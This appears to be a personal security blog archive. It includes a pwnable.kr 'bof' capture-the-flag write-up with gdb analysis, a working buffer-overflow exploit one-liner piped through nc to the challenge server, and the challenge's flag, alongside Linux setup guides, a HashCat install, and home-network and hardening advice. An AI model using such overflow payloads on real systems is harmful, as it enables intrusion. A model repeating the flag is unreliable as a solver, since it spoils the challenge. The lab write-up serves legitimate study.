Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF categories on the pwnable.kr website. The challenge I am going to do is named bof. There are already many writeups on the internet. However, I am going to explain what I learnt from this game.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examined the source code and found out that we need to change the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" variable is 32 characters long. No matter what you enter in the "overflowme" variable, the "key" is not changed, as it is hard coded. It is a buffer overflow challenge. However, we are not going to take control of the return address this time.



Load the binary in gdb with PEDA and check it with "checksec". It confirms that NX is enabled, along with other restrictions.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassemble the "func" function.

disass func



In the "func" function, the following instructions are the ones I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

In "lea eax,[ebp-0x2c]", "ebp-0x2c" is probably where the "overflowme" buffer lives, and its address is loaded into the eax register.

In "cmp DWORD PTR [ebp+0x8],0xcafebabe", "ebp+0x8" probably holds the value of "key", that is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then run the program with "r"; when prompted, enter "helloworld" as the "overflowme" input.



After entering "helloworld", I examine "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirmed what I suspected. I calculate the offset between the two addresses with Python. The offset is 52.



Once I have the offset, I overwrite "0xdeadbeef" with "0xcafebabe" using the exploit code. The "cat" command keeps the shell interactive.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000



The flag is :

daddy, I just pwned a buFFer :)
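As an added illustration (not the pwnable.kr source), here is the hardened counterpart of func(): the same 32-byte buffer, but filled with a bounded fgets() instead of gets(), so the 56-byte input above stops at the buffer's edge and never reaches the key argument. The fmemopen() wrapper and the helper names are my own.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

#define OVERFLOWME_LEN 32

/* Hardened counterpart of the challenge's func(): the same 32-byte stack
 * buffer, but filled with fgets(), which never writes more than
 * sizeof(overflowme) bytes. Over-long input is truncated, so nothing above
 * the buffer (saved ebp, return address, the key argument at ebp+0x8) can be
 * clobbered. Returns 1 if the key check that guards system("/bin/sh") in the
 * original would pass, 0 otherwise; *stored_len (may be NULL) receives how
 * many input bytes actually landed in the buffer. */
int func_safe(unsigned int key, FILE *in, size_t *stored_len)
{
    char overflowme[OVERFLOWME_LEN];

    if (fgets(overflowme, sizeof overflowme, in) == NULL)
        overflowme[0] = '\0';                       /* EOF or read error */
    overflowme[strcspn(overflowme, "\n")] = '\0';   /* strip newline, if any */

    /* If the buffer filled up completely, discard the rest of the line so a
     * later read does not mistake the leftover bytes for fresh input. */
    if (strlen(overflowme) == sizeof overflowme - 1) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }

    if (stored_len)
        *stored_len = strlen(overflowme);
    return key == 0xcafebabe;
}

/* Feeds a payload to func_safe() through an in-memory stream (fmemopen,
 * POSIX) so the behaviour can be checked without a terminal. Returns -1 if
 * the stream could not be created. */
int run_payload(const char *payload, unsigned int key, size_t *stored_len)
{
    FILE *in = fmemopen((void *)payload, strlen(payload), "r");
    int result;

    if (in == NULL)
        return -1;
    result = func_safe(key, in, stored_len);
    fclose(in);
    return result;
}

/* Builds the 56-byte input the writeup sends to the real challenge: 52 filler
 * bytes followed by 0xcafebabe in little-endian byte order (constructed here).
 * Returns the payload length, or 0 if the output buffer is too small. */
size_t build_challenge_payload(char *out, size_t cap)
{
    if (cap < 57)
        return 0;
    memset(out, 'A', 52);
    memcpy(out + 52, "\xbe\xba\xfe\xca", 4);
    out[56] = '\0';
    return 56;
}

/* Runs the challenge payload against func_safe() with the original
 * hard-coded key and reports how many bytes survived the bounded read. */
size_t challenge_payload_kept_bytes(void)
{
    char payload[64];
    size_t len = 0;

    build_challenge_payload(payload, sizeof payload);
    run_payload(payload, 0xdeadbeef, &len);
    return len;
}

int main(void)
{
    size_t len = 0;

    printf("helloworld       -> shell=%d\n",
           run_payload("helloworld\n", 0xdeadbeef, &len));
    printf("52xA + cafebabe  -> bytes kept=%zu (buffer holds %d)\n",
           challenge_payload_kept_bytes(), OVERFLOWME_LEN - 1);
    return 0;
}
```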




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with the latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it updated. However, most tutorials on the internet only teach you to copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/. It is very hard to keep track of the latest update this way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh :

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the setting in Firefox's Add-ons - Plugins - Shockwave Flash from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest version, 5.2.22. Since the official version of Virtualbox cannot be installed on Kali Linux, the Kali version is to be installed. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.


Monday, November 26, 2018

HOWTO : nVidia and HashCat on Kali Linux 2018.4

CPU : Intel i7-8750H (6-core with HyperThreading and Graphic Display)
Extra Graphic Display : nVidia GTX 1060 (laptop)

There are two graphics cards on the same system, namely an Optimus laptop. The installation of the nVidia display driver on Kali Linux 2018.4 is different from Ubuntu 18.04.1 on the same system. You can refer to the link here for Ubuntu 18.04.1, even though they use the same version of the nVidia display driver, version 390.87 at the time of this writing.

Step 1 :

apt update
apt install nvidia-kernel-dkms primus bumblebee bbswitch-dkms nvidia-smi


Step 2 :

Reboot the system.

To confirm the installation :

nvidia-smi

Step 3 :

Install HashCat, which does not require CUDA.

apt install hashcat-nvidia

Step 4 (optional) :

To install CUDA :

apt install nvidia-cuda-toolkit

To run a program that requires CUDA :

bumblebeed --daemon
optirun [program]


That's all! See you.


Friday, October 26, 2018

HOWTO : Tensorflow 1.11.0 on Ubuntu 18.04.1 LTS with Anaconda3 5.3.0

Install Anaconda3, which is Python 3. The current version of Python in Anaconda3 is 3.7.x.

sudo apt install build-essential libssl-dev libffi-dev python3-dev

wget https://repo.continuum.io/archive/Anaconda3-5.3.0-Linux-x86_64.sh

chmod +x Anaconda3-5.3.0-Linux-x86_64.sh

./Anaconda3-5.3.0-Linux-x86_64.sh

Install anaconda3 to /home/samiux/anaconda3 (current user, samiux) and then answer "yes" to allow changes to samiux's .bashrc. (Replace "samiux" with your username.)

source /home/samiux/.bashrc

Update Anaconda3 :

conda update --prefix /home/samiux/anaconda3 anaconda
conda update -n base conda


Since the current Tensorflow 1.11.0 only supports Python 3.6 among the Python 3.x versions, we need to install Python 3.6 in a virtual environment for Tensorflow.

conda create -n venv pip python=3.6
conda install tensorflow -n venv


To activate the virtual environment (Python 3.6) :

conda activate venv

To deactivate it when not using Python 3.6 and Tensorflow :

conda deactivate

To test the Tensorflow installation :

(venv) samiux@ubuntu:~$ python -c "import tensorflow as tf; print(tf.__version__)"

It will display the current version of Tensorflow, which is 1.11.0 at the time of this writing.

1.11.0

That's all! See you.


Sunday, October 21, 2018

China - No Wallet

China's Great Leap to Wallet-Free Living - Moving Upstream

Amazing China: Mobile Payments Change Way of Life in China

Amazing China: Crazy mobile payment in China

Sunday, September 09, 2018

Croissants - Intrusion Detection and Prevention System

Croissants (牛角麵包) - Intrusion Prevention System

Croissants (牛角麵包) is an open source project, but there is a commercial project of the same name; the open source edition is called Croissants Community Edition. The paid edition has technology to block network scanner probes and to push updates; otherwise it is largely the same as the open source edition.

Croissants is to a considerable degree comparable to a Unified Threat Management System (UTM) and a Next Generation Firewall (NG Firewall); the only difference is that Croissants does not include a firewall.

Croissants is a system designed and developed by a hacker to deal with hackers, whether they are ethical hackers or malicious ones.

Features of the open source edition :

It has most of the features of a UTM and NG Firewall, such as exploit prevention, virus attack prevention, malicious IP address blacklisting, malware attack prevention, malicious web page attack filtering, blocking Tor browsing, blocking hostile network traffic, and detecting network scanner scans.

As for performance, it has ultra-low latency, which effectively improves the playability of online games and allows 4K multimedia to be played smoothly; it can handle roughly 40GB of traffic or more, which of course depends heavily on the hardware specification.

As for deployment, it can be placed almost anywhere in the network, both outside and inside. Combined with Audra (奧德拉), an intrusion detection system, every network segment can be covered. Audra is also an intrusion detection system designed on the basis of Croissants (Community Edition); its components are exactly the same.

Features of the paid edition :

Besides the features of the Community Edition, it also has push update technology: in an emergency, Croissants can be updated remotely at once, to achieve the best intrusion prevention result.

In addition, it can block the probes of all network scanners, so that hackers cannot effectively obtain information about their intended target and therefore cannot mount an effective attack. Attacking blindly is futile. This prevents or delays the possibility of intrusion, and the feature is particularly suited to environments with servers deployed in the network.

Samiux
OSCE OSCP OSWP


************


Croissants - Intrusion Detection and Prevention System

Croissants is an open source project and a commercial project at the same time. The open source project is named Croissants Community Edition (CE), while the commercial one is Croissants. Croissants and Croissants CE are almost the same. However, Croissants has some outstanding techniques, such as push update and upgrade as well as blocking network scanning.

Croissants is very similar to a Unified Threat Management System (UTM) and a Next Generation Firewall (NG Firewall). However, Croissants does not include a firewall.

Croissants is designed by a hacker to defend against hackers. He knows what hackers are doing and thinking, whether they are ethical or malicious.

Croissants CE Features :

Croissants CE has features similar to a UTM and NG Firewall, such as preventing vulnerability exploits, anti-virus, malicious IP address blacklisting, preventing malicious software, filtering web page attacks, preventing the Tor network from being accessed, blocking malicious traffic, detecting network scanning, etc.

It is an ultra-low latency system which is ideal for demanding online games and 4K video streaming. The maximum bandwidth of Croissants is over 40GB, depending on the hardware configuration.

Croissants CE can be placed anywhere in the network, including outside and inside the network segments. When deployed together with Audra (Intrusion Detection System), traffic monitoring in the network can be covered completely. Audra is designed based on Croissants CE.

Croissants Features :

Croissants has all the features of Croissants CE, plus push update and upgrade features. It provides an emergency update or upgrade in order to give better protection to the network when needed.

In addition, it can also block network scanning. Once scanning is blocked, hackers cannot obtain information about the services and ports of the network/servers, and they cannot launch attacks blindly. As a result, you may be prevented from being attacked, or the attack may be delayed. Croissants is ideal for networks that provide connections to the public.

Samiux
OSCE OSCP OSWP

Reference

InfoSec Ninjas 资安忍者


Sunday, August 26, 2018

HOWTO : Intel and nVidia GPUs on Ubuntu 18.04.1 LTS

The version of the nVidia driver for Ubuntu 18.04.1 is 390 at the time of this writing. You have 3 methods to switch between the Intel GPU and the nVidia GPU. However, these require your box to reboot or relogin for the change to take effect.

(A) nVidia Driver Install

sudo apt install bbswitch-dkms nvidia-dkms-390 nvidia-driver-390 nvidia-headless-390 nvidia-kernel-common-390 nvidia-prime nvidia-settings nvidia-utils-390 xserver-xorg-video-nvidia-390 nvidia-cuda-toolkit

Method 1 - Reboot is required
nvidia-settings

Select nVidia GPU or Intel GPU from "Prime" on the menu. After that, reboot your box.

This method works only when the nVidia driver is loaded. You need to reboot your box for the change to take effect.

To confirm the change :

prime-select query

Method 2 - Reboot is required

To change to Intel GPU :

You need to reboot your box for the change to take effect.

sudo prime-select intel

To change to nVidia GPU :

sudo prime-select nvidia

You need to reboot your box for the change to take effect.

To check the settings :

prime-select query

Method 3 - Relogin is required

To install the modified version of prime-select :

sudo apt install git rustc cargo lightdm
git clone https://github.com/matthieugras/Prime-Ubuntu-18.04

cd Prime-Ubuntu-18.04
cd prime_socket/src
sudo make install


The "prime-select" binary is located at /usr/local/bin.

Rename the original "prime-select" :

sudo mv /usr/bin/prime-select /usr/bin/prime-select-original

Change to lightdm :

sudo dpkg-reconfigure gdm3

Select lightdm and then reboot the box.

Prime sync for a tear-free laptop panel :

sudo nano /etc/modprobe.d/zz-nvidia-modeset.conf

Add the following lines :

# enable prime-sync
options nvidia-drm modeset=1


Then run the following command and then reboot your box :

sudo update-initramfs -u

To change to Intel GPU :

sudo prime-select intel

The box will force you to log out and wait for you to log in again.

To change to nVidia GPU :

sudo prime-select nvidia

The box will force you to log out and wait for you to log in again.

To check the settings :

prime-select query

(B) Optional

To check what nVidia driver version is installed :

ubuntu-drivers devices

To auto-install the nVidia driver :

sudo ubuntu-drivers autoinstall

(C) Conclusion

Set the Intel GPU for power saving and the nVidia GPU for performance. For Kali Linux or Parrot Security OS users, I recommend using Method 2 after installing the nVidia driver. The package names of the nVidia driver for Kali Linux and Parrot Security OS are different from Ubuntu 18.04.1 LTS. When using Method 3, the Intel display card cannot display video properly. However, Method 2 has no such problem.

That's all! See you.


Thursday, August 09, 2018

Penetration Testing and Capture The Flag

On my first contact with Capture The Flag (CTF) competitions, I found that they differ greatly from real penetration testing. Take the Web challenges on a CTF practice site as an example: a CTF challenge gives hints that lead to the key for the next stage, or the hint is used to complete the challenge itself. A real-world web site penetration test has no hints; the tester has to use their own methods to gather as much information about the site as possible before taking further action. Moreover, most CTF challenges are detached from reality and very tricky.

Personally I think that if a professional penetration tester spends a long time immersed in CTF challenges, it may affect their professional thinking and their way of doing penetration testing, and it brings no real gain in professional knowledge; still, playing them as a game in spare time is not a bad thing.

As for the other CTF format, attack and defense, I have not yet had the chance to try it, so I will not pass judgment. By coincidence, I recently played some challenges I understood on a rather poor CTF practice site (beta.ctflearn.com), and ranked 27th among more than 12,000 players (as of August 9, 2018). During play I did not feel that I learnt anything new, which is a pity.

Finally, I personally think that the most effective way to gain real penetration testing knowledge and skill is to join bug bounty programs. Finding a vulnerability and being rewarded is of course a pleasure, but even without a reward you can practise on a legal platform, because every bug bounty target is a real case.

Samiux
OSCE OSCP OSWP

Wednesday, August 01, 2018

Ma Yan-kwok (馬恩國) Explains the Basic Law: Video Series

Ma Yan-kwok Explains the Basic Law (1): Origin of the Basic Law
Ma Yan-kwok Explains the Basic Law (2): On Interpretation: the Ng Ka Ling case
Ma Yan-kwok Explains the Basic Law (3): On Interpretation: the Congo case
Ma Yan-kwok Explains the Basic Law (4): On Interpretation: political reform and the Chief Executive's term of office
Ma Yan-kwok Explains the Basic Law (5): On Interpretation: the Legislative Council oath-taking case
Ma Yan-kwok Explains the Basic Law (6): On Interpretation: the power to interpret the Basic Law and the benefits of interpretation
Ma Yan-kwok Explains the Basic Law (7): Sovereignty and national security
Ma Yan-kwok Explains the Basic Law (8): High degree of autonomy and overall jurisdiction
Ma Yan-kwok Explains the Basic Law (9): Fifty years unchanged and One Country, Two Systems
Ma Yan-kwok Explains the Basic Law (10): Relationship between the Central Government and the SAR
Ma Yan-kwok Explains the Basic Law (11): The SAR's legislative power and arrangements under a state of emergency
Ma Yan-kwok Explains the Basic Law (12): Channels for Hong Kong people to take part in national affairs
Ma Yan-kwok Explains the Basic Law (13): Rights of Hong Kong people
Ma Yan-kwok Explains the Basic Law (14): The Executive Council, the Chief Executive's functions and the power to dissolve the Legislative Council
Ma Yan-kwok Explains the Basic Law (15): The executive authorities
Ma Yan-kwok Explains the Basic Law (16): The Legislative Council
Ma Yan-kwok Explains the Basic Law (17): The judiciary
Ma Yan-kwok Explains the Basic Law (18): Civil servants' treatment and oath-taking
Ma Yan-kwok Explains the Basic Law (19): External affairs
Ma Yan-kwok Explains the Basic Law (20): The power to amend the Basic Law

If Loving You Is Wrong (I Don't Want To Be Right) - Barbara Mandrell

National Security and the National Security Law of China

Yu Fei (余非): Dealing with the minions, and a more fundamental consideration: national security and the National Security Law of China



Thursday, July 19, 2018

[LAB] Capture The Flag - July 2018

VulnHub gathers a lot of Capture The Flag virtual machines for practice.

In July 2018, I did some of them and wrote writeups about the exploits. I mainly targeted the VirtualBox virtual machines only. They run on the NAT Network interface in VirtualBox.

They are :

(1) BlackMarket
(2) BSides Vancouver 2018 (Workshop)
(3) JIS-CTF : VulnUpload
(4) Bob v2
(5) Toppo v1
(6) DerpNStink v1
(7) Temple of Doom v1
(8) Zico2 v1
(9) Dina 1.0.1
(10) Basic Pentesting : 2

That's all! See you.


Friday, June 29, 2018

The Asch Conformity Experiments

Recently, while chatting with a friend, we talked about the Asch conformity experiments. These experiments found that most people, under group pressure, blindly go along with the crowd or change their own views to follow the majority.

Asch conformity experiments






My friend immediately quoted Mark Twain's famous line :

Whenever you find yourself on the side of the majority, it is time to pause and reflect. -- Mark Twain

Later I realised that this line has another meaning: when you find yourself among the majority, you should reflect on whether you have stagnated and stopped making progress.

Reference links

Wikipedia (Chinese) - Asch conformity experiments
Wikipedia - Asch conformity experiments


Monday, June 18, 2018

Deepin and Ubuntu Kylin

Deepin (深度系統) and Ubuntu Kylin (優麒麟) are both well-known Linux distributions developed in mainland China, each with its own character; here is a brief introduction.

Deepin Linux is developed by Wuhan Deepin Technology, based on Debian stable. Its Deepin Desktop Environment (DDE) is an open source project of Deepin Technology.

Deepin supports many languages, and its desktop environment is simple and intuitive to set up, with no unnecessary steps. It has its own software repository of commonly used applications; installing and removing software is as easy as a single click. Most Microsoft Windows applications can run on it, because the system is designed for users moving from Windows to Linux who still cannot do without Microsoft products. It boots and shuts down very quickly; its only shortcoming is that it does not support full-disk encryption.

Ubuntu Kylin is developed by the CCN Open Source Software Innovation Joint Laboratory in Beijing, jointly founded by the Software and Integrated Circuit Promotion Center of the Ministry of Industry and Information Technology, the National University of Defense Technology of the People's Liberation Army, and Canonical, the company behind Ubuntu. Its desktop environment is UKUI, based on MATE.

Ubuntu Kylin is designed for mainland Chinese users; although it supports many languages, its own software repository has a Simplified Chinese interface. It is designed for users who move from Microsoft Windows to Linux and give up Windows completely. In its repository it points out which packages are substitutes for Windows applications, which is very thoughtful. Its UKUI interface closely resembles the Windows interface, so users will not feel lost, yet it is one hundred percent Ubuntu. All software is the latest version, and configuration is the same as Ubuntu.

Deepin and Ubuntu Kylin target different user groups, but both are designed to move Windows users to Linux, and each has its strengths. If you have time, install Deepin and Ubuntu Kylin and experience their features and design.


Deepin (深度系統)
Ubuntu Kylin (優麒麟)


Sunday, June 17, 2018

For Want Of A Nail (只因少了一颗钉)

For Want of a Nail

For want of a nail the shoe was lost.
For want of a shoe the horse was lost.
For want of a horse the rider was lost.
For want of a rider the message was lost.
For want of a message the battle was lost.
For want of a battle the kingdom was lost.
And all for the want of a horseshoe-nail.

-- Benjamin Franklin


For Want of a Nail (Chinese version, translated)

Without the nail, the horseshoe was lost.
Without the horseshoe, the warhorse was lost.
Without the warhorse, the knight was lost.
Without the knight, the intelligence was lost.
Without the intelligence, the battle was lost.
Without the battle, the kingdom was lost.
And all because of the want of a horseshoe nail.

-- Franklin




See Also

The Butterfly Effect

In chaos theory, the butterfly effect is the sensitive dependence on initial conditions in which a small change in one state of a deterministic nonlinear system can result in large differences in a later state.

Butterfly Effect (Chinese version, translated)

The butterfly effect refers to a dynamic system in which tiny changes in the initial conditions can drive a huge long-term chain reaction across the whole system; it is a chaotic phenomenon. The term "butterfly effect" also appears frequently in chaos theory.


The Broken Windows Theory

The broken windows theory is a criminological theory that visible signs of crime, anti-social behavior and civil disorder create an urban environment that encourages further crime and disorder, including serious crimes. The theory thus suggests that policing methods that target minor crimes such as vandalism, public drinking and fare evasion help to create an atmosphere of order and lawfulness, thereby preventing more serious crimes.

Broken Windows Theory (Chinese version, translated)

The broken windows theory is a criminological theory proposed by James Q. Wilson and George L. Kelling, published in an article titled "Broken Windows" in the March 1982 issue of The Atlantic Monthly. It argues that if undesirable phenomena in an environment are left unchecked, they entice people to imitate them and even escalate.


Reference

Wikipedia - For Want of a Nail
Wikipedia (Chinese) - For Want of a Nail
Wikipedia - Broken Windows Theory
Wikipedia (Chinese) - Broken Windows Theory
Wikipedia - Butterfly Effect
Wikipedia (Chinese) - Butterfly Effect


That's all! See you.


Friday, June 08, 2018

Home Network Security Rules (Chinese version, translated)

In view of the many recent incidents of routers and network storage devices being compromised, I think it is necessary to strengthen our knowledge of home network security. Most people only half understand network security or know nothing about it at all, so I will explain in a direct way and avoid technical jargon.

Router

Routers come in wired and wireless types, and most home routers are two-in-one versions that combine wired and wireless functions.

When setting up the router, you must change the router's default password, and use a strong and complex password.

When configuring router administration, never enable Remote Management, that is, do not allow the router to be managed from outside the home. Remote management is enabled by default on most routers.

When setting up a wireless router, use WPA3; if that is not available, use at least WPA2. For encryption, AES is best, with a password of at least twelve characters that includes uppercase and lowercase letters, digits and punctuation. WPA3 routers will come on the market by the end of this year, and at that point WPA3 must be used.

Update the router firmware regularly. If the vendor has not released a firmware update for a year or more, or the model has been discontinued, you must replace it with a new router. Always keep the router's specification up to date.

Do not open ports casually. Check whether any ports are open to the internet, such as port 22 (SSH), 23 (Telnet), 80 (http), 443 (https) or 8080 (proxy). If you find any, I strongly recommend closing them to the internet immediately; note that some routers open them by default.

Desktop

Update the operating system regularly and keep it at the latest version. Do not install or download software of unknown origin, and do not use pirated software or media. Keep the browser updated and do not visit bad or pirate web sites. It is best to install and enable a firewall and not to open ports casually.

On Microsoft Windows systems, anti-virus software must be installed. On Apple macOS or Linux, you may consider installing anti-virus software. Linux can also be hardened at zero cost (see my blog for details).

Do not keep using old versions of an operating system, and certainly not ones that are no longer supported or updated.

Network Attached Storage (NAS)

If you have a NAS, I absolutely do not agree with connecting it directly to the internet for remote access. If remote access is really needed, I strongly recommend using a virtual private network (VPN), and the firmware must be updated regularly. A VPN is usually found on more expensive routers.

Finally, I wish everyone safe and happy surfing on the internet!

Samiux
OSCE OSCP OSWP
June 7, 2018 Hong Kong, China



Home Network Security Rules

Recently, many routers and network attached storage (NAS) devices have been infected by malware or attacked. It is high time to refresh our home network security knowledge.

Router

There are wired and wireless routers on the market; home routers usually combine both. We should change the default password of the router's login control panel to a strong and complicated one. It is not wise to let the router be controlled remotely; it is better to disable this feature even though it is enabled by default.

When setting up wireless, it is recommended to set it to WPA3 once that is available at the end of this year. If not, at least set it to WPA2 with AES encryption. Set a strong and complicated password that includes uppercase and lowercase letters, numbers and symbols.

Update the router firmware when it is available and always keep it up-to-date. If you do not get a firmware update from the vendor for more than a year, or the router has been phased out, you should purchase a new and modern one.

Make sure ports 22 (ssh), 23 (telnet), 80 (http), 443 (https) and 8080 (proxy) are not opened or forwarded to the public on the router.

Desktop

Update your operating system often and keep it up-to-date. Do not install any pirated or unknown-source software or media. Make sure no port is open to the public.

If you are using Microsoft Windows, it is recommended to install an anti-virus program. You may consider installing one on Apple macOS and Linux as well. Meanwhile, you can harden your Linux system at no extra cost; for details please read my blog.

Never use an out-of-date operating system, especially when it is no longer supported or has been phased out.

Network Attached Storage (NAS)

Update the firmware to the latest version often. I do not recommend letting your NAS be accessed from the internet. When necessary, I strongly recommend doing so via a virtual private network (VPN). More expensive routers may be equipped with a VPN feature.

Finally, happy internet surfing!

Samiux
OSCE OSCP OSWP
June 7, 2018 Hong Kong, China


Wednesday, June 06, 2018

Defending the Bridgehead (Chinese version, translated)

Strictly speaking I hold several jobs: I am an open source project developer, system administrator, network penetration tester, information security researcher, and also a company clerk. I am an information security enthusiast holding the relevant professional certifications, namely OSCE, OSCP and OSWP.

I have two networks at home, one for daily operation and the other for penetration testing and software testing. The daily network has a web server, a private cloud file server, a virtual machine server, two routers and an intrusion prevention system; the web server also has an AI web application firewall.

My daily routine is to update all desktop and server systems, read information security news and research reports, develop information security open source software or systems, write blog posts and so on. For an amateur information security person, that is a lot of work.

Because I have a programming and information security background, I have developed some information security open source projects, among them an intrusion prevention system (Croissants, 牛角麵包) and an AI web application firewall (Longjing, 龍井), both developed independently by me.

The intrusion prevention system I developed can prevent known malicious IP addresses from accessing my network, prevent known malware from being downloaded or accessed, prevent network scanning software from scanning my network, prevent some known security vulnerabilities from being exploited, and prevent me from visiting known malicious web sites. It has ultra-low latency, so I can watch 4K video and play online games smoothly; all the intrusion prevention rules are free, and it is compatible with all major computer and mobile operating systems. Its hardware requirements are not high and the build cost is very low, so it is efficient, strong in defense and economical.

As for the web application firewall, it is a deep learning AI WAF and an open source project. It mainly defends against SQL Injection (SQLi) attacks, but it can also defend against Cross Site Scripting (XSS) and some lower-risk attacks, and it can confuse web vulnerability scanners. If a malicious hacker scans my web site with a vulnerability scanner, the scanner reports a huge number of vulnerabilities, all of them false positives, so the hacker is misled by my WAF and wastes a lot of time verifying each false report. This AI WAF is very easy to install and maintain; although its performance is not very high, its detection accuracy is over 99 percent, which is quite good.

Thanks to these two open source projects I developed myself, I can handle other security matters with peace of mind without constantly monitoring my network security in person. Although there is no absolutely secure computer system in this world (No System Is Safe), my open source projects really do take on some of the heavy security work, which is ideal. On top of that I have hardened every Linux desktop and Linux server, especially the Firefox browser, so I am even more at ease.

That is how I defend my bridgehead, the network.



Bridgehead Defense

I am not only a clerk but also an open source project developer, system administrator, penetration tester and information security (infosec) researcher. I am an information security enthusiast with OSCE, OSCP and OSWP certificates.

I have two networks at home, one for production and the other for testing purposes. There are a web server, a private cloud server, a virtual machine hosting server, two routers and an intrusion detection and prevention system (IDPS) in the production network. There is also a web application firewall (WAF) in front of the web server.

Every day I update all my desktops and servers, read information security articles and research reports, develop infosec related open source projects and write blog articles. It is a lot of work for an amateur information security guy indeed.

Since I have a programming and infosec background, I develop infosec related open source projects, such as an IDPS (Croissants) and a deep learning driven WAF (Longjing).

The IDPS prevents known malicious IP addresses from accessing my network; it prevents known malware from being downloaded or accessed; it prevents my network from being scanned by vulnerability scanners; it prevents known vulnerabilities from being exploited; and it prevents me from accessing malicious web sites. Meanwhile, I can watch 4K video and play demanding online games thanks to the low latency of the IDPS. All the rules are free of charge and it is compatible with popular operating systems and smartphones. It is a low cost and high performance solution.

The WAF is an open source deep learning driven WAF, mainly designed to prevent the web application from being attacked by SQL Injection (SQLi). However, it also detects Cross Site Scripting (XSS) and other vulnerabilities. It spoofs web application vulnerability scanners, causing them to produce a lot of false positive results, so malicious hackers waste a lot of time figuring out what happened. Although the WAF is not designed for performance, the SQLi detection rate is over 99%.

It is because these open source infosec projects are deployed in my network that I can do my research and develop infosec projects without worry. Although no system is safe, they help me a lot with network monitoring. Meanwhile, I have also hardened all my Linux desktops and Linux servers, including the browser, Firefox. As a result, I feel very good about that.

That is the story of my bridgehead defense: the network.


Thursday, May 31, 2018

What is "Independent Research and Development"?

Recently I have often heard or seen the term "independent research and development" (自主硏發). Yet my compatriots in Hong Kong, China often misunderstand the term; they think it means starting from zero, but I do not agree.

According to Baidu Baike, "independent" (自主) means :

"Independence means being one's own master and not being controlled by others. In psychology, independence means having one's own opinion when facing matters and being able to take responsibility for one's own actions."

According to Baidu Baike, "research and development" (硏發) means :

"R&D, in English Research & Development, i.e. research and development, refers to the continuous, systematic activities with clear goals carried out by research institutions and enterprises to obtain new scientific and technological knowledge (excluding the humanities and social sciences), to apply new scientific and technological knowledge creatively, or to substantially improve technologies, products and services. It generally refers to the research and development of products and technology. R&D is a kind of innovation and requires creative work."

Many technology projects today are open source; the original creators allow others to use or modify them free of charge under the open source license, and to redistribute them under the same license. So we do not need to reinvent the wheel; we only need to stand on the shoulders of the wise and innovate from there.

For example, several of my open source projects are built on one or more other open source projects. Croissants (牛角麵包), the intrusion prevention system I developed, is mainly based on the open source Suricata engine and other open source projects. Another of my open source projects, Nighthawk (夜鷹), is developed on the open source project Tor. And my AI web application firewall Longjing (龍井) is developed using the open source Scikit-Learn library. These are all open source projects developed by myself, which can also be called "independent research and development".

So I personally think that "independent research and development" does not mean that all development starts from zero. It is just like how we do not need to invent the aeroplane again; we only need to improve it, or evolve from the aeroplane project to another product.

Reference links :

Baidu Baike - "Independent" (自主)
Baidu Baike - "Research and Development" (硏發)
Croissants (牛角麵包)
Nighthawk (夜鷹)
Longjing (龍井)
Wikipedia - Research and Development


Postscript

The origin of the term "independent research and development" more or less has its historical background. The United States has long prohibited the export of high-tech products to China; violators face imprisonment and heavy fines, and if you are ethnic Chinese you are also charged with espionage. So China had to develop corresponding products for domestic use, and the term spread.


Wednesday, May 30, 2018

HOWTO : Hardening And Tuning Of Ubuntu 18.04 LTS

This guide hardens and tunes your Ubuntu Server/Desktop 18.04 LTS without extra effort.

(A) Buffer Overflow Prevention

Make sure "No Execute (NX)" or "Execute Disable (XD)" in the BIOS/UEFI has been enabled. Then run the following command :

sudo dmesg | grep --color '[NX|XD]*protection'

[ 0.000000] NX (Execute Disable) protection: active

If you see the output above or something similar, you have set it right.

(B) Kernel Hardening and Tuning

Copy the content to the file "60-croissants.conf" :



sudo nano /etc/sysctl.d/60-croissants.conf
sudo sysctl -p /etc/sysctl.d/60-croissants.conf


The configuration file hardens the kernel with a set of parameters, including ASLR.

(C) Firefox Hardening (For Desktop Only)

sudo apt install apparmor-utils
sudo aa-enforce /etc/apparmor.d/usr.bin.firefox


To change to complain mode :

sudo aa-complain /etc/apparmor.d/usr.bin.firefox

(D) SSD Tuning

Append "scsi_mod.use_blk_mq=1" to "GRUB_CMDLINE_LINUX_DEFAULT" :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash scsi_mod.use_blk_mq=1"

sudo update-grub

Then reboot the box.

(E) File System Tuning

Insert "noatime,nodiratime,norelatime," into the mount options of the "/dev/mapper/ubuntu--vg-root" entry :

/dev/mapper/ubuntu--vg-root / ext4 noatime,nodiratime,norelatime,errors=remount-ro 0 1

sudo mount -a
sudo mount -o remount /


